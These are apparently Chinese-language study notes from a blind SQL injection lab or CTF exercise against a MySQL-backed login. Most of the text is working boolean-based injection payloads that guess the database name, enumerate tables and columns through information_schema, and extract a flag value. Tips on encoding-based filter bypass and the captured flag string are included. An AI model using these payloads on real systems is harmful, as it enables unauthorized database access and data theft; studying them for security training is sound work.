sql盲注學習
information_schema.schemata(schema_name)
information_schema.tables(table_name,table_schema)
information_schema.columns(column_name,table_name)
盲注與poc編寫:https://bbs.ichunqiu.com/thread-31587-1-1.html
基於bool報錯的sql注入:
瞭解sql語句的巢狀與sql常用函式:http://blog.51cto.com/bxbx258/106008、
mysql中的字符集與常用字元編碼繞過:
ascii():http://tool.oschina.net/commons?type=4
在前端:html實體編碼:&#xx,js:\uxx,url:%xx [0-255]
在php與MySQL中:可以注入十六進位制字串:\uxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
猜資料庫:字元長度,具體字元
-1' or length(database())=10# 8
-1' or left(database(),1)>'m'#
abcdef ghijklm nopqr stuvwxyz
admin' or left(database(),2)>|='we'# admin' or left(database(),8)='web_test'#
猜資料庫中的表:
admin' or length(select table_name from information_schema.tables where table_schema='web_test' limit 0,1)>10#
admin' or length((select table_name from information_schema.tables where table_schema='web_test' limit 0,1))=4# user 注意這個必須為兩個括號
admin' or ascii(substr((select table_name from information_schema.tables where table_schema='web_test' limit 0,1),1,1))=117#
admin' or substr((select table_name from information_schema.tables where table_schema='web_test' limit 0,1),1,4)='USER'#
web_test.flag
猜欄位
admin' or (select count(column_name) from information_schema.columns where table_name='flag')>10# 猜數目
admin' or length((select column_name from information_schema.columns where table_name='flag'))>5# 猜長度4
admin' or substr((select column_name from information_schema.columns where table_name='flag'),1,4)='flag'#
admin' or ascii(substr((select flag from web_test.flag),1,1))>32#
flag{8o5_1s_th3_b3st_c1ass}